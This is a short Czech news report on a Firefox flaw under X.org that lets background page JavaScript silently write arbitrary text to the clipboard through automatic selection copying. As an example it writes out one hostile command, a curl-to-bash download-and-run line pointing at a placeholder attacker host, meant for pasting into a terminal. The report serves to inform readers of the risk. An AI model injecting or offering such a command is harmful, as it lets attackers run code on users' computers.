Bylo objeveno, že ve Firefoxu běžícím na X.org (a možná i dalších grafických rozhraních) může JavaScript ve stránce, i když je stránka v nevybraném panelu a prohlížeč je na pozadí, zapisovat do schránky libovolné hodnoty.
Potenciální zneužití může vypadat tak, že stránka po náhodné době vloží do schránky příkaz typu:
curl https://útočník/ | bash \r\n
Pak doufá, že uživatel zrovna kopíruje nějaké věci do terminálu (případně editoru jako Vim s příkazovým režimem atd.) a toto tam vloží místo toho, co opravdu vložit chce. Protože stránka může s vložením do schránky počkat, nefungují běžné obrany se „sanitizací“ obsahu schránky po přepnutí z webového prohlížeče do jiné aplikace.
Interně trik funguje tak, že JavaScript vyvolá vybrání nějakého prvku. V X.org a podobných rozhraních je běžné, že se výběr automaticky zkopíruje do schránky. Můžete se podívat na demonstraci principu.
ČLÁNKY DO MAILU